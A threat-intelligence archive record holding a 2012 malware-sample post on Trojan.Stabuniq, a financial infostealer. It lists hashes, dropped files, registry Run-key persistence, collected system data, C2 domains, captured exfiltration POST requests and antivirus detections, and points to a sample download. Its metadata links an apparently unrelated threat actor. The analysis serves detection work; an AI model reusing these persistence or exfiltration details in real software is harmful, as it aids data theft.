{
	"id": "9d224568-0888-463d-9e15-91e8b4a47dbc",
	"created_at": "2026-04-06T00:06:47.324511Z",
	"updated_at": "2026-04-10T13:11:43.63814Z",
	"deleted_at": null,
	"sha1_hash": "fa51a98e20f85a937fdd65f80a62fb834ba45be7",
	"title": "Dec. 2012 Trojan.Stabuniq samples - financial infostealer trojan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 89108,
	"plain_text": "Dec. 2012 Trojan.Stabuniq samples - financial infostealer trojan\r\nArchived: 2026-04-05 14:46:49 UTC\r\nDec. 2012 Trojan.Stabuniq samples - financial infostealer trojan\r\nHoliday presents.\r\nResearch: Symantec. Trojan.Stabuniq Found on Financial Institution Servers\r\nMore research: Stabuniq in-Depth  by Emanuele De Lucia\r\nHere is a another minor news maker of 2012.\r\nIt is very well detected by most AV but if you want to play or make IDS or yara signatures, the pcap and the sample is below.\r\nFile\r\nFile: stabuniq_F31B797831B36A4877AA0FD173A7A4A2\r\nSize: 79360\r\nMD5:  F31B797831B36A4877AA0FD173A7A4A2\r\nDownload  Email me if you need the password\r\nDownload pcap for F31B797831B36A4877AA0FD173A7A4A2\r\nF31B797831B36A4877AA0FD173A7A4A2\r\n========================================================================\r\n5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb\r\nCreated files:\r\nC:\\Program Files\\7-Zip\\Uninstall\\smagent.exe  \u003c\u003c copy of itself F31B797831B36A4877AA0FD173A7A4A2\r\nInjected in iexplore.exe\r\nProcess ID: 1536 (iexplore.exe)\r\n1536 TCP 1130 172.16.253.129 SYN SENT 205.234.252.212:80\r\nAt this point domains maybe sinkholed\r\nPOST /rssnews.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: benhomelandefit.com\r\nContent-Length: 1093\r\nCache-Control: no-cache\r\nid=NzQxKDYoNig3\u0026varname=SmdzdGc=\u0026comp=QkNKSl5S\u0026ver=UW9oYmlxdSZeVg==\u0026src=NTREb3I=\u0026sec=0\u0026view=dWtnYWNocihjfmMmKy\r\nPOST /rssnews.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: sovereutilizeignty.com\r\nContent-Length: 1093\r\nCache-Control: no-cache\r\nhttp://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html\r\nPage 1 of 3\n\nid=NzQxKDYoNig3\u0026varname=SmdzdGc=\u0026comp=QkNKSl5S\u0026ver=UW9oYmlxdSZeVg==\u0026src=NTREb3I=\u0026sec=0\u0026view=dWtnYWNocihjfmMmKy\r\n$2jX\r\nWhen the Trojan is executed, it may create the following files:\r\n%ProgramFiles%\\[FOLDER NAME ONE]\\[FOLDER NAME TWO]\\acroiehelper.exe\r\n%ProgramFiles%\\[FOLDER NAME ONE]\\[FOLDER NAME TWO]\\groovemonitor.exe\r\n%ProgramFiles%\\[FOLDER NAME ONE]\\[FOLDER NAME TWO]\\issch.exe\r\n%ProgramFiles%\\[FOLDER NAME ONE]\\[FOLDER NAME TWO]\\jqs.exe\r\n%ProgramFiles%\\[FOLDER NAME ONE]\\[FOLDER NAME TWO]\\smagent.exe\r\nThe variable [FOLDER NAME ONE] may be one of the following: \r\nAcroIEHelper Module\r\nGrooveMonitor Utility\r\nInstallShield Update Service Scheduler\r\nJava Quick Starter\r\nSoundMAX service agent\r\nThe variable [FOLDER NAME TWO] may be one of the following:\r\nBin\r\nHelper\r\nInstaller\r\nUninstall\r\nUpdate\r\nNext, the Trojan creates the following registry entries so that it runs every time Windows starts:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\"[RANDOM GUID]\" = \"[FILE\r\nNAME]\"\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\"[RANDOM GUID]\" = \"\r\n[FILE NAME]\"\r\nHKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\"[RANDOM GUID]\" = \"[FILE\r\nNAME]\"\r\nThe Trojan then creates the following registry entry:\r\nHKEY_CURRENT_USER\\Software\\Stability Software\\\"Uniq\" = \"[RANDOM GUID]\"\r\nNext, the Trojan may collect the following information from the compromised computer:\r\nArchitecture type\r\nComputer name\r\nFile name of the threat\r\nIP address\r\nOperating system version\r\nOperating system service pack version, if installed\r\nRunning processes\r\nThe Trojan may then send the stolen information to the following remote locations:\r\nanatwriteromist.com\r\nbbcnews192.com\r\nbelsaw920.com\r\nbenhomelandefit.com\r\nmidfielderguin.com\r\nprominentpirsa.com\r\nsovereutilizeignty.com\r\nyolanda911.com\r\nhttps://www.virustotal.com/file/5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb/analysis/\r\nSHA256: 5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb\r\nSHA1: 17db1bbaa1bf1b920e47b28c3050cbff83ab16de\r\nMD5: f31b797831b36a4877aa0fd173a7a4a2\r\nFile size: 77.5 KB ( 79360 bytes )\r\nFile name: vti-rescan\r\nFile type: Win32 EXE\r\nTags: peexe armadillo\r\nDetection ratio: 28 / 45\r\nAnalysis date: 2012-12-21 13:48:23 UTC ( 2 days, 16 hours ago )\r\nAhnLab-V3 Backdoor/Win32.Ruskill 20121221\r\nAntiVir TR/Graftor.27095.3 20121221\r\nAvast Win32:Ruskill-FQ [Trj] 20121221\r\nhttp://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html\r\nPage 2 of 3\n\nAVG Dropper.Generic6.CAIC 20121221\r\nBitDefender Gen:Variant.Graftor.27095 20121221\r\nDrWeb Trojan.Packed.22607 20121221\r\nEmsisoft Gen:Variant.Graftor.27095 (B) 20121221\r\nESET-NOD32 a variant of Win32/Injector.RVT 20121221\r\nF-Secure Gen:Variant.Graftor.27095 20121221\r\nFortinet W32/Injector.RVT!tr 20121221\r\nGData Gen:Variant.Graftor.27095 20121221\r\nIkarus Worm.Win32.Dorkbot 20121221\r\nKaspersky HEUR:Trojan.Win32.Generic 20121221\r\nMalwarebytes Backdoor.Bot.wpm 20121221\r\nMcAfee Generic.dx!bg3a 20121221\r\nMicrosoft Trojan:Win32/Buniq.A 20121221\r\nMicroWorld-eScan Gen:Variant.Graftor.27095 20121221\r\nNANO-Antivirus Trojan.Win32.Graftor.ymdbi 20121221\r\nNorman W32/Suspicious_Gen4.BCNST 20121221\r\nPanda Generic Malware 20121221\r\nPCTools Trojan.Stabuniq 20121221\r\nSophos Mal/FakeAV-QN 20121221\r\nSUPERAntiSpyware - 20121220\r\nSymantec Trojan.Stabuniq 20121221\r\nTheHacker Trojan/Injector.rvt 20121220\r\nTrendMicro TROJ_STABUNIQ.A 20121221\r\nTrendMicro-HouseCall TROJ_STABUNIQ.A 20121221\r\nVIPRE Trojan.Win32.Generic!BT 20121221\r\nSource: http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html\r\nhttp://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html"
	],
	"report_names": [
		"dec-2012-trojanstabuniq-samples.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434007,
	"ts_updated_at": 1775826703,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa51a98e20f85a937fdd65f80a62fb834ba45be7.pdf",
		"text": "https://archive.orkl.eu/fa51a98e20f85a937fdd65f80a62fb834ba45be7.txt",
		"img": "https://archive.orkl.eu/fa51a98e20f85a937fdd65f80a62fb834ba45be7.jpg"
	}
}